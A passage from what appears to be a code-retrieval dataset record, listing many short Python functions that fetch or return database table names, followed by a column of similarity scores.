\"{\\\\listoverridetable\\n\"\n for listDef in self.lists:\n id = listDef.id\n listTables += listDef.getRtf()\n overrideTables += (\"{\\\\listoverride\\\\listid%d\"\n \"\\\\listoverridecount0\\\\ls%d}\\n\" % (id, id))\n return listTables + \"}\\n\" + overrideTables + \"}\\n\"", "def tables(cls):\n if not hasattr(cls, '_tables'):\n cls.parse_attributes()\n return cls._tables", "def list_tables(service):\n r = _post(service)\n if 'tables' in r:\n return [table(p) for p in r['tables']]\n return None", "def show_tables(self):\n try:\n c = self.conn\n cur = c.cursor()\n sql = (\"SHOW TABLES;\")\n cur.execute(sql)\n return cur.fetchall()\n except sqlc.Error as e:\n print (\"MySQL exception #{0}: {1}\".format(e.errno, e.msg))\n return None\n except Exception as e:\n msg = \"\"\n for arg in e.args:\n msg = msg + arg + \"\\n\"\n print (\"Couldn't get list of tables: {0}\".format(msg))\n return None", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def list_tables(option, opt, value, parser):\n print \"CCP Data Dump Table List\"\n print \"------------------------\"\n for table in util.IMPORT_LIST:\n print \"%s\" % table.__name__.replace('Importer_', '')\n print \"-- %d tables --\" % len(util.IMPORT_LIST)\n # The -l argument is just used for listing, proceed no further.\n exit_with_succ()", "def table_name(self) -> str:\n return \"OLTP\"", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def tableName():\n return \"people\"", "def _notifications_lists_tblname(self):\n return 'notifications_lists'", "def list_tables(jwt_payload: dict, schema_name: str):\n DJConnector.set_datajoint_config(jwt_payload)\n\n # Get list of tables names\\\n tables_name = dj.schema(schema_name).list_tables()\n\n # Dict to store list of table name for each type\n tables_dict_list = dict(manual_tables=[], lookup_tables=[], computed_tables=[],\n imported_tables=[], part_tables=[])\n\n # Loop through each table name to figure out what type it is and add them to\n # tables_dict_list\n for table_name in tables_name:\n table_type = dj.diagram._get_tier(\n '`' + schema_name + '`.`' + table_name + '`').__name__\n print(table_name, table_type, flush=True)\n if table_type == 'Manual':\n tables_dict_list['manual_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Lookup':\n tables_dict_list['lookup_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Computed':\n tables_dict_list['computed_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Imported':\n tables_dict_list['imported_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Part':\n table_name_parts = table_name.split('__')\n tables_dict_list['part_tables'].append(DJConnector.snake_to_camel_case(\n table_name_parts[-2]) + '.' 
+ DJConnector.snake_to_camel_case(\n table_name_parts[-1]))\n else:\n print(table_name + ' is of unknown table type')\n\n return tables_dict_list", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def tables(self):\n cursor = self.connection.cursor()\n\n # not returning an iterator: just fetch everything.\n # I'm guessing this will be fine for any realistic database\n # size, and avoids issues of having multiple open cursors\n # at the same time.\n cursor.execute('SHOW TABLES')\n table_names = []\n for result_data in cursor:\n for table_name in result_data.values():\n table_names.append(table_name)\n\n definitions = OrderedDict()\n for table_name in table_names:\n cursor.execute('SHOW CREATE TABLE %s' % table_name)\n if not cursor.rowcount:\n raise ValueError(\"Failed to execute SHOW CREATE TABLE command on table %s\" % table_name)\n\n result_data = cursor.fetchone()\n definitions[table_name] = result_data['Create Table']\n\n cursor.close()\n\n return definitions", "def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]", "def print_tables(self):\n print \"------------------\\nTables\\n------------------\"\n cnt = 0\n for x in self.show_tables():\n cnt += 1\n print (\"{0}.) {1}\".format(cnt, x[0]))", "def tablename(klass):\n if not hasattr(klass, 'TABLENAME'):\n inf = Inflector()\n klass.TABLENAME = inf.tableize(klass.__name__)\n return klass.TABLENAME", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def tables(self):\n return self.properties.get('tables',\n WorkbookTableCollection(self.context, ResourcePath(\"tables\", self.resource_path)))", "def get_tables(self, *, only_names=True, verbose=False, cache=True):\n\n if cache and self._cached_tables is not None:\n tables = self._cached_tables\n else:\n tables = self._tap.load_tables(only_names=only_names, include_shared_tables=False, verbose=verbose)\n self._cached_tables = tables\n if only_names:\n return [t.name for t in tables]\n else:\n return tables", "def get_table_name(self):\n return self._table", "def _exceptions_lists_tblname(self):\n return 'exceptions_lists'", "def get_tables_name_and_type(self) -> Optional[Iterable[Tuple[str, str]]]:\n try:\n schema_name = self.context.database_schema.name.__root__\n if self.source_config.includeTables:\n for table_and_type in self.query_table_names_and_types(schema_name):\n table_name = self.standardize_table_name(\n schema_name, table_and_type.name\n )\n table_fqn = fqn.build(\n self.metadata,\n entity_type=Table,\n service_name=self.context.database_service.name.__root__,\n database_name=self.context.database.name.__root__,\n schema_name=self.context.database_schema.name.__root__,\n table_name=table_name,\n skip_es_search=True,\n )\n if filter_by_table(\n self.source_config.tableFilterPattern,\n table_fqn\n if self.source_config.useFqnForFiltering\n else table_name,\n ):\n self.status.filter(\n table_fqn,\n \"Table Filtered Out\",\n )\n continue\n yield table_name, table_and_type.type_\n\n if self.source_config.includeViews:\n for view_name in self.inspector.get_view_names(schema_name):\n view_name = self.standardize_table_name(schema_name, view_name)\n 
view_fqn = fqn.build(\n self.metadata,\n entity_type=Table,\n service_name=self.context.database_service.name.__root__,\n database_name=self.context.database.name.__root__,\n schema_name=self.context.database_schema.name.__root__,\n table_name=view_name,\n )\n\n if filter_by_table(\n self.source_config.tableFilterPattern,\n view_fqn\n if self.source_config.useFqnForFiltering\n else view_name,\n ):\n self.status.filter(\n view_fqn,\n \"Table Filtered Out\",\n )\n continue\n yield view_name, TableType.View\n except Exception as err:\n logger.warning(\n f\"Fetching tables names failed for schema {schema_name} due to - {err}\"\n )\n logger.debug(traceback.format_exc())", "def tablename(entity) -> str:\n return entity.__tablename__", "def getTableKeys(self, tableName):\n sql = \"SHOW COLUMNS FROM %s\" % tableName\n resultSet = []\n try:\n results = self.selectOpt(sql)\n for r in results:\n resultSet.append(r['Field'])\n except:\n print(\"[ERROR] Table '%s' does not exist.\" % tableName)\n return resultSet", "def test_defined_table_names(model):\n required_tables = {\"user\", \"service\", \"role\", \"permission\", \"instance\"}\n\n defined_tables = []\n for model in defined_models:\n defined_tables.append(model.__tablename__)\n\n assert len(required_tables.difference(defined_tables)) == 0", "def table(self):\n return self._table_name", "def list_tables(dataset_name, project=None):\n bigquery_client = bigquery.Client(project=project)\n dataset = bigquery_client.dataset(dataset_name)\n\n if not dataset.exists():\n print('Dataset {} does not exist.'.format(dataset_name))\n return\n\n for table in dataset.list_tables():\n print(table.name)", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def get_handled_tables(cls) -> list[str]:\n return [\"image_virtual_paths\"]", "def list_all_tables(db):\n # Get the tables which exist in the database\n db_tables = ex_sql_and_fetch(db, \"SELECT * FROM pg_catalog.pg_tables\")\n tables = [t[1] for t in db_tables]\n # Get the master tables from the Config\n config_tables = load_config()[db]['schemas'].keys()\n\n # Check to eliminate tables which don't exist from the Config\n relevant = [t for t in tables for c in config_tables if c in t]\n return relevant", "def create_table_statements() -> [str]:\n pass", "def get_tables(self):\n logging.debug(f\"\"\"get_tables\"\"\")\n conn = self.connect(cxRepo)\n sql = f\"\"\"select table_name,server1_select,server2_select,schema1,\n schema2,tips from {self.schemaRepo}.tablediff\n where step = 0 and result = 'init' order by id\"\"\"\n with conn:\n with conn.cursor() as curs:\n try:\n curs.execute(sql)\n except conn.DatabaseError as exc:\n error, = exc.args\n logging.error(f\"\"\"error executing {sql} : {error}\"\"\")\n rows = curs.fetchall()\n return rows", "def get_tablename(self):\n return self.ds_table", "def get_tables_in_schema(self, conn, schema_name):\n return conn.get_tables(schema_name)['table_name']", "def show_tablespaces(self):\n sql = \"SELECT TABLESPACE_NAME FROM DBA_TABLESPACES WHERE CONTENTS <> 'TEMPORARY' ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#TABLESPACE}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def list_tables(self):\n request_pb = table_messages_v2_pb2.ListTablesRequest(parent=self.name)\n # We 
expect a `table_messages_v2_pb2.ListTablesResponse`\n table_list_pb = self._client._table_stub.ListTables(\n request_pb, self._client.timeout_seconds)\n\n result = []\n for table_pb in table_list_pb.tables:\n table_prefix = self.name + '/tables/'\n if not table_pb.name.startswith(table_prefix):\n raise ValueError('Table name %s not of expected format' % (\n table_pb.name,))\n table_id = table_pb.name[len(table_prefix):]\n result.append(self.table(table_id))\n\n return result", "def _extract_table_names_from_sql(query):\n # a good old fashioned regex. turns out this worked better than actually parsing the code\n tables_blocks = re.findall(r'(?:FROM|JOIN)\\s+(\\w+(?:\\s*,\\s*\\w+)*)', query, re.IGNORECASE)\n tables = [tbl\n for block in tables_blocks\n for tbl in re.findall(r'\\w+', block)]\n return list(dict.fromkeys(tables).keys()) # remove duplicates, keeping order", "def __dir__(self) -> list[str]:\n attrs = dir(type(self))\n unqualified_tables = [self._unqualify(x) for x in self.tables]\n return sorted(frozenset(attrs + unqualified_tables))", "def create_all_tables(self):\n pass", "def linked_tables(self, table):\n fk0 = (table.foreign_keys[0].referenced_columns[0]['schema_name'],\n table.foreign_keys[0].referenced_columns[0]['table_name'])\n fk1 = (table.foreign_keys[1].referenced_columns[0]['schema_name'],\n table.foreign_keys[1].referenced_columns[0]['table_name'])\n return [fk0, fk1]", "def table_name(self) -> str:\n return self.model._meta.db_table", "def get_table_list(self, add_attached=False):\n self._check_connection()\n if self.isMSSQL(): # pragma: no cover\n request = \"\"\" SELECT TABLE_NAME FROM (\n SELECT TABLE_NAME, OBJECTPROPERTY(object_id(TABLE_NAME), N'IsUserTable') AS type\n FROM INFORMATION_SCHEMA.TABLES) AS temp_tbl\n WHERE type = 1 ORDER BY TABLE_NAME\"\"\"\n else:\n request = \"\"\" SELECT name\n FROM (SELECT * FROM sqlite_master UNION ALL SELECT * FROM sqlite_temp_master) AS temptbl\n WHERE type in('table','temp') AND name != 'sqlite_sequence' ORDER BY name;\"\"\"\n\n select = self._connection.execute(request)\n res = []\n for el in select:\n res.append(el[0])\n\n if add_attached:\n att = self.get_attached_database_list()\n for at in att:\n if at == \"temp\":\n continue\n sql = \"SELECT name FROM %s.sqlite_master\" % at\n vie = self._connection.execute(sql)\n vie = [\"%s.%s\" % (at, v[0]) for v in vie]\n res.extend(vie)\n return res", "def get_my_tables(self):\n qnum = self.master('sql', att={'type': 'table'}) # it's a Table._call_() function call\n if self.run():\n return (self.table_factory(self.get_table_info(result[0])) for result in self.results[qnum])\n else:\n print('An error has occurred when initializing the database.')", "def query_table_names_and_types(\n self, schema_name: str\n ) -> Iterable[TableNameAndType]:\n\n return [\n TableNameAndType(name=table_name)\n for table_name in self.inspector.get_table_names(schema_name) or []\n ]", "def table_list(self, name=None, strict=True):\n response = self.send(root_url=self.session.dm_url + self.root_url,\n verb=GenericClient.VERB.GET,\n template=TEMPLATES['table_list'],\n uri_params={'name': name, 'strict': strict},\n data=None,\n files=None)\n\n is_5xx(response, \"Unexpected server error : {code}\")\n\n return response.json", "def get(self):\n args = ledger_name_choices.parse_args(req=None, strict=False)\n return DdlServices.list_tables(**args)" ]
[ "0.8072151", "0.8006719", "0.8002535", "0.7987537", "0.78607845", "0.78607196", "0.78587925", "0.78372866", "0.7792003", "0.7758121", "0.7746107", "0.7651905", "0.76492196", "0.76076037", "0.7603518", "0.75557685", "0.7516995", "0.7435231", "0.74144286", "0.7379448", "0.7368278", "0.72656804", "0.723463", "0.71644396", "0.7161553", "0.71569264", "0.7112894", "0.7089295", "0.70296675", "0.7022113", "0.70183444", "0.70173496", "0.6962833", "0.6955991", "0.69515085", "0.6893105", "0.6880555", "0.68752456", "0.6844747", "0.6833746", "0.6817075", "0.6812117", "0.68085647", "0.6787855", "0.6778046", "0.67671853", "0.67337364", "0.67264235", "0.6697339", "0.6694135", "0.66818595", "0.66481775", "0.66091335", "0.6596406", "0.6572924", "0.65683895", "0.6559849", "0.65463436", "0.65156424", "0.646561", "0.64645046", "0.64620286", "0.64389277", "0.64202076", "0.64182454", "0.6415122", "0.6403268", "0.63859314", "0.6380775", "0.63664097", "0.63469005", "0.6334049", "0.63194555", "0.6299579", "0.62980086", "0.6295057", "0.6282662", "0.62539226", "0.62341654", "0.6218945", "0.6218945", "0.6218945", "0.6208454", "0.6197732", "0.618393", "0.61813205", "0.61802727", "0.6167346", "0.61546916", "0.61536574", "0.61307055", "0.61270595", "0.6122126", "0.6106731", "0.6101466", "0.6098372", "0.60708475", "0.6050666", "0.6047697", "0.6030042" ]
0.698688
32
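Note that the positive document for the query above ("List of table names") is only a stub with no body. A minimal, self-contained sketch of one plausible completion follows; it assumes a SQLite file path argument (the stub's parameter "n" is ambiguous), and every name in it is illustrative rather than taken from the source repository.

import sqlite3

def make_table_names_list(db_path):
    # Hypothetical completion: return the names of all user tables
    # in a SQLite database file, filtering out SQLite's own
    # internal tables such as sqlite_sequence.
    conn = sqlite3.connect(db_path)
    try:
        cur = conn.execute(
            "SELECT name FROM sqlite_master "
            "WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
        )
        return [row[0] for row in cur.fetchall()]
    finally:
        conn.close()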
List of database names
def makeDatabaseNamesList(n, ):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_databases():\n config = load_config()\n\n databases = [x for x in config.keys() if \"schemas\" in config[x]]\n return databases", "def get_database_names(self) -> Iterable[str]:\n custom_database_name = self.service_connection.__dict__.get(\"databaseName\")\n\n database_name = self.service_connection.__dict__.get(\n \"database\", custom_database_name or \"default\"\n )\n # By default, set the inspector on the created engine\n self.inspector = inspect(self.engine)\n yield database_name", "def list_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_data = self.get_databases()\n all_dbs = []\n for data in all_data:\n all_dbs.append(data[\"system:resource_name\"][\"@value\"])\n return all_dbs", "def getDatabases(self):\n query = 'SELECT name FROM sys.databases'\n df = pd.read_sql(query, self.conn)\n return df", "def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"databases\")", "def list_databases(self):\n end_point = '/'.join([self.host, 'api', 'databases', ''])\n resp = requests.get(end_point, headers={'Authorization': 'Token {}'.format(self.token)})\n if resp.status_code != 200:\n raise ClientError('Encountered error getting list of databases: {}'.format(resp.json()))\n return resp.json()", "def _get_db_names(self, dbs, strict=True):\n dbs = utils.coerce_to_list(dbs)\n db_names = [utils.get_name(db) for db in dbs]\n if strict:\n good_dbs = self.instance.list_databases()\n good_names = [utils.get_name(good_db) for good_db in good_dbs]\n bad_names = [db_name for db_name in db_names\n if db_name not in good_names]\n if bad_names:\n bad = \", \".join(bad_names)\n raise exc.NoSuchDatabase(\"The following database(s) were not \"\n \"found: %s\" % bad)\n return db_names", "def get_available_databases() -> List[str]:\r\n\tcur = psycopg2.connect(dbname='postgres').cursor()\r\n\tcur.execute(\"SELECT datname FROM pg_database WHERE datistemplate=FALSE;\")\r\n\treturn [row[0][:-6] for row in cur if row[0].endswith('wikidb')]", "def list_databases(self):\n r = self.__get_response(settings.LST_DBS)\n if r[\"status\"] == 200:\n return r[\"result\"]\n raise Exception(r[\"result\"][\"message\"])", "def list_dbs(self):\n return self.get('_all_dbs').json()", "def get_available_databases():\n return map(\n lambda (key, value): (key, value[\"description\"]),\n DumpConverter.DATABASES.items())", "def list_all_databases():\n with _superuser_connection() as conn:\n result = conn.list_all_databases()\n return result", "def databases(self):\n return self._databases", "def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in x:\n\t\t\tprint(db['name'])", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def all_dbs(self):\n return self.cloudant_client.all_dbs()", "def get_databases(self):\n query = mssqlqueries.get_databases()\n logger.info(u'Databases query: %s', query)\n for tabular_result in self.execute_query(query):\n return [x[0] for x in tabular_result[0]]", "def list_databases(self, limit=None, marker=None):\n return self._database_manager.list(limit=limit, marker=marker)", "def get_schemas(self):\n result = self.sql(\"SHOW DATABASES\").execute()\n return [row[0] for row in result.fetch_all()]", "def get_databases(self):\n 
pass", "def get_databases ():\n return _dbobjects[:]", "def list_databases():\n response = houston.get(\"/history/databases\")\n houston.raise_for_status_with_json(response)\n return response.json()", "def get_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_dbs = []\n for scope in self._dispatch_json(\"get\", self._api)[\"system:role\"][\n \"system:capability\"\n ][\"system:capability_scope\"]:\n if scope[\"@type\"] == \"system:Database\":\n all_dbs.append(scope)\n return all_dbs", "def databases(self) -> Session:\n uri = f\"{self.uri}/databases\"\n return self.request(uri=uri, method=\"GET\").json()", "def databases(self, instance, **query):\n instance = self._get_resource(_instance.Instance, instance)\n return self._list(_database.Database, instance_id=instance.id, **query)", "def getDatabaseName(self):\n raise NotImplementedError", "def setupDatabases(con, options, dbList):\n currentDatabases = dbGetFirstColumnAsMap(con, \"select datname from pg_database where datistemplate = false\")\n currentRolenames = dbGetFirstColumnAsMap(con, \"select rolname from pg_roles\")\n trace(\"currentDatabases = \" + str(currentDatabases))\n for dbName in dbList:\n trace(\"dbName='%s'\" % str(dbName))\n setupDatabase(con, options, currentDatabases, currentRolenames, dbName, dbList[dbName])", "def show_dbs(*dbs):\n if dbs:\n log.debug(\"get dbs from pillar: %s\", dbs)\n result = {}\n for db in dbs:\n result[db] = __salt__[\"pillar.get\"](\"oracle:dbs:\" + db)\n return result\n else:\n pillar_dbs = __salt__[\"pillar.get\"](\"oracle:dbs\")\n log.debug(\"get all (%s) dbs from pillar\", len(pillar_dbs))\n return pillar_dbs", "def get_db_name(self):\n\t\treturn conf.db_name", "def getTables(self):\n\treturn self.dbNames", "def database_name(self) -> str:\n return pulumi.get(self, \"database_name\")", "def databases(self) -> dict:\n db_info = self.landscape_info[\"databases\"]\n return db_info", "def list_databases(self, instance, limit=None, marker=None):\n return instance.list_databases(limit=limit, marker=marker)", "def databases(self, rel_id=None):\n rel = self.framework.model.get_relation(self.relation_name, rel_id)\n\n relation_data = rel.data[rel.app]\n dbs = relation_data.get(\"databases\")\n return json.loads(dbs) if dbs else []", "def _get_requested_databases(self):\r\n requested_databases = []\r\n if ((self._requested_namespaces is not None) and\r\n (self._requested_namespaces != [])):\r\n for requested_namespace in self._requested_namespaces:\r\n if requested_namespace[0] is '*':\r\n return []\r\n elif requested_namespace[0] not in IGNORE_DBS:\r\n requested_databases.append(requested_namespace[0])\r\n return requested_databases", "def get_attached_database_list(self, file=False):\n if self.isMSSQL():\n return [] # pragma: no cover\n else:\n cur = self._connection.cursor()\n cur.execute(\"PRAGMA database_list;\")\n res = cur.fetchall()\n cur.close()\n res = [r for r in res if r[1] != \"temp\" and r[1] != \"main\"]\n if file:\n return [(r[1], r[2]) for r in res]\n else:\n return [r[1] for r in res]", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def getDatabaseName(self):\n return 
self._base.getDatabaseName()", "def databases(database_container):\n database_container.setupall()\n return database_container", "def database_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database_name\")", "def _get_database_name(database):\n # make sure the return is only one data type\n filenames = []\n if database is not None:\n if not isinstance(database, list):\n database = [database]\n for db in database:\n filenames += glob.glob(db)\n\n return filenames", "def db_name(self):\n return self._db_name", "def get_dbservers(self):\n ret = []\n for i in self.all_instances:\n if i.is_dbserver():\n ret.append(i)\n return ret", "def database():\n return conf().database", "def __get_available_databases(self, root):\n\t\tfor i in walk_tree(root):\n\t\t\tif '.sqlite3' in i:\n\t\t\t\tyield os.path.abspath(i)", "def get_available_databases():\n\n available_databases = dict()\n all_databases = resource_keys('database', strip=[])\n for database in all_databases:\n try:\n database_entry_point = load_resource(database, 'database')\n\n available_databases[database] = dict()\n\n # Checking if the database has data for the ZT normalization\n available_databases[database][\"has_zt\"] = hasattr(database_entry_point, \"zobjects\") and hasattr(database_entry_point, \"tobjects\")\n available_databases[database][\"groups\"] = []\n # Searching for database groups\n try:\n groups = list(database_entry_point.groups()) or [\"dev\"]\n for g in [\"dev\", \"eval\"]:\n available_databases[database][\"groups\"] += [g] if g in groups else []\n except Exception:\n # In case the method groups is not implemented\n available_databases[database][\"groups\"] = [\"dev\"]\n except Exception:\n pass\n return available_databases", "def parse_databases(default_dbname=\"cal_manager.db\"):\n db_list = []\n calconf = get_calconf()\n if not calconf:\n return db_list\n upload_cookie = calconf.get(\"upload_cookie\")\n # Allow old-format file to be read\n try:\n databases = calconf[\"databases\"]\n except KeyError:\n databases = calconf.get(\"database_dir\")\n if not databases:\n return db_list\n with warnings.catch_warnings():\n warnings.simplefilter(\"always\", DeprecationWarning)\n warnings.warn(\"Use 'databases' instead of 'database_dir' in \"\n \"config file.\",\n DeprecationWarning\n )\n for line in databases.splitlines():\n if not line: # handle blank lines\n continue\n db, *flags = shlex.split(line)\n # \"get\" is default if there are no flags, but if any flags are\n # specified, then \"get\" must be there explicitly\n kwargs = {\"get_cal\": not bool(flags),\n \"store_cal\": False}\n for flag in flags:\n kwarg = f\"{flag}_cal\"\n if kwarg in kwargs:\n kwargs[kwarg] = True\n else:\n raise ValueError(\"{}: Unknown flag {!r}\".format(db, flag))\n\n expanded_db = path.expanduser(db)\n if path.isdir(expanded_db):\n db = path.join(db, default_dbname)\n cls = LocalDB\n elif path.isfile(expanded_db):\n cls = LocalDB\n elif \"/\" in expanded_db and \"//\" not in expanded_db:\n cls = LocalDB\n else: # does not check\n cls = RemoteDB\n kwargs[\"upload_cookie\"] = upload_cookie\n db_list.append((cls, db, kwargs))\n return db_list", "def get_db_name(account=None, species=None, db_type=None, release=None,\n division=None, DEBUG=False):\n if account is None:\n account = get_ensembl_account(release=release)\n \n if DEBUG:\n print \"Connection To:\", account\n print \"Selecting For:\", species, db_type, release\n \n server = DbConnection(account, db_name='PARENT')\n cursor = server.cursor()\n show = \"SHOW DATABASES\"\n if 
species or db_type or release:\n pattern = make_db_name_pattern(species, db_type, release)\n show = \"%s LIKE %s\" % (show, pattern)\n if DEBUG:\n print show\n cursor.execute(show)\n rows = cursor.fetchall()\n dbs = []\n for row in rows:\n try:\n if division is not None and division not in row[0]:\n continue\n name = EnsemblDbName(row[0])\n if (release is None or name.Release == str(release)) and\\\n (db_type is None or name.Type == db_type):\n dbs.append(name)\n except (IndexError, RuntimeError):\n if DEBUG:\n print \"FAIL:\", row[0]\n continue\n return dbs", "def list(self, instance, limit=None, marker=None):\n return self._list(\"/instances/%s/databases\" % base.getid(instance),\n \"databases\", limit, marker)", "def getDatabaseName( self ):\n return self.mDbname", "def read_db_list(tablename = None):\n\n # Set the default tablename\n if tablename is None:\n tablename = config[\"default-table\"]\n\n conn, tunnel = create_db_conn()\n result = None\n\n try:\n cur = conn.cursor()\n cur.execute(\"USE %s\"%(config['db']))\n cur.execute(\"SELECT * FROM %s;\"%(tablename,))\n conn.commit()\n result = cur.fetchall()\n\n except Exception as e:\n print(\"read_data_list failed\")\n print(e)\n\n conn.close()\n tunnel.close()\n return result", "def dbname(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dbname\")", "def db_lookup(client):\n dblist_dict= client.get_list_database()\n # print(\"def db_lookup 010:\", dblist_dict)\n # print(\"def db_lookup 020:\", dblist_dict[3]['name'])\n # for element in dblist_dict:\n # print(\"db_lookup 3:\", element['name'])\n return dblist_dict", "def dbinfo(self):\n data = self._http_get(\"dbInfo\")\n return data.json()", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def _db_uri_parts():\n return app.config['SQLALCHEMY_DATABASE_URI'].split('/')", "def database_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"database_name\")", "def summary(self):\n\t\tprint \"Summary--------------------------------------:\"\n\t\tprint \"Available data sources are:\"\n\t\tfor path in self.available_databases:\n\t\t\tprint path", "def index(self, req, instance_id):\n LOG.info(\"Call to Databases index - %s\", instance_id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n local_id = dbapi.localid_from_uuid(instance_id)\n ctxt = req.environ['nova.context']\n common.instance_available(ctxt, instance_id, local_id, self.compute_api)\n try:\n result = self.guest_api.list_databases(ctxt, local_id)\n except Exception as err:\n LOG.error(err)\n raise exception.InstanceFault(\"Unable to get the list of databases\")\n LOG.debug(\"LIST DATABASES RESULT - %s\", str(result))\n databases = {'databases':[]}\n for database in result:\n mysql_database = models.MySQLDatabase()\n mysql_database.deserialize(database)\n databases['databases'].append({'name': mysql_database.name})\n LOG.debug(\"LIST DATABASES RETURN - %s\", databases)\n return databases", "def num_databases ():\n return len(_dbobjects)", "def list_tables(database):\n config = load_config()\n tables = [x for x in config[database]['schemas']]\n\n return tables", "def database(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database\")", "def get_database_name(self, data: dict) -> str: # pylint: disable=arguments-differ\n if not data[\"database_name\"] and 
self.service_connection.database:\n return self.service_connection.database\n return data[\"database_name\"]", "def dbdescs(data, dbname):\n # pylint: disable=bad-continuation\n return {\n 'admin': onedesc(data, dbname, 'admin', 'rw'),\n 'user': onedesc(data, dbname, 'user', 'rw'),\n 'viewer': onedesc(data, dbname, 'viewer', 'ro')\n }", "def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def fulldbname(self):\n return 'myfls_'+self.user.username+'_'+self.dbname", "def mysql_database():\n return DATABASE", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def mysql_database_name():\n return 'test'", "def remove_dbs():\n conn = pm.MongoClient(host=testhost,\n port=testport)\n print('Removing:')\n [print(x) for x in conn.database_names() if x.startswith(testdbname)]\n [conn.drop_database(x) for x in conn.database_names() if x.startswith(testdbname)]", "def makeDatabaseList():\n charList = []\n for ch in lower:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in numbers:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in special:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in other:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n if(caseSensitive):\n for ch in upper:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch, url)\n if(wildCards):\n for ch in wildCards:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch, url)\n return charList", "def get_inform_from_db(database_file_name: str) -> list:\n global data\n con = sqlite3.connect(database_file_name)\n cur = con.cursor()\n master = 'sqlite_master'\n query = \"SELECT name FROM \" + master + \" WHERE type = 'table'\"\n cur.execute(query)\n data = cur.fetchall()\n return data", "def database_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"database_name\")", "def check_db(self):\n if self.db == 'user':\n db = USERS_LIST\n return db\n elif self.db == 'questions':\n db = QUESTIONS_LIST\n return db\n elif self.db == 'meetups':\n db = MEETUPS_LIST\n return db\n\n elif self.db == 'rsvp':\n db = RSVP_LIST\n return db", "def show_tables(self, name_db):\n conn, cursor = SQLDatabase.connect()\n try:\n cursor.execute(\"SHOW TABLES FROM {}\".format(name_db))\n self.all_tables = [table[0] for table in cursor.fetchall()]\n except mysql.connector.errors.ProgrammingError as err:\n print(\"{} : {} --> unknown\".format(err, name_db))\n finally:\n SQLDatabase.close(cursor, conn)\n\n return self.all_tables", "def get_name(self) -> str:\n return self.dbname", "def get_database_directory(self):\n pass", "def multi_database(database_factories):\n databases = {}\n result = []\n for factory in database_factories:\n name = factory.name or ''\n if name in databases:\n raise ValueError(\"Duplicate database name: %r\" % name)\n db = factory.open()\n db.databases = databases\n db.database_name = name\n databases[name] = db\n # Grrr bug in ZODB. 
